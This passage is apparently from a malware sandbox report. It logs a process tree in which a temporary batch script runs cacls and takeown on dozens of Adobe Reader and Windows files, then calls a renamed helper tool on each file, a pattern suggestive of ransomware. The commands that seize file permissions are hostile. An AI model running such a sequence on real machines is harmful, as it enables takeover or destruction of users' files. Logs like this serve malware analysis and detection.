    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:3360
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:4864
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:3324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    - Modifies file permissions
    PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:2888
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:3344
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4844
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui""
  2⤵
  PID:3300
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui"
    3⤵
    PID:3400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:3376
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    PID:3508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:964
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:2480
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:4056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3524
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:3520
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3892
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:3108
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:2780
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui""
  2⤵
  PID:4112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\PDIALOG.exe.mui"
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:4116
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:4120
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui""
  2⤵
  PID:4152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:4796
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui""
  2⤵
  PID:3932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\NBMapTIP.dll.mui"
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:4296
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:4324
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""
  2⤵
  PID:4344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4404
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui"
    3⤵
    - Modifies file permissions
    PID:4368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:3628
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:4528
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Journal\Templates\Genko_1.jtp""
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Genko_1.jtp" /E /G Admin:F /C
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Genko_1.jtp"
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "Genko_1.jtp" -nobanner
    3⤵
    PID:4080
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "Genko_1.jtp" -nobanner
      4⤵
      PID:4588
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui""
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\de-DE\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:4624
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:4640
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui""
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3696
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\ja-JP\WinMail.exe.mui"
    3⤵
    PID:1976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3008
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:4532
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:3040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3636
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:2232
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1296
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:2708
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:3600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:4944
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2668
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "main.css" -nobanner
    3⤵
    PID:2776
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "main.css" -nobanner
      4⤵
      PID:3604
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:5044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    PID:3732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:3784
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:3780
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:3756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:684
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:2504
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    - Modifies file permissions
    PID:1868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:2336
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:2740
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:4904
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:2400
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:2008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:1776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:1028
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:3036
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:4788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:1348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:2972
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:2468
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:2868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:940
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:2736
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:2172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:3136
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:3104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:3224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "background.png" -nobanner
    3⤵
    PID:3240
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3188
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\cacls.exe
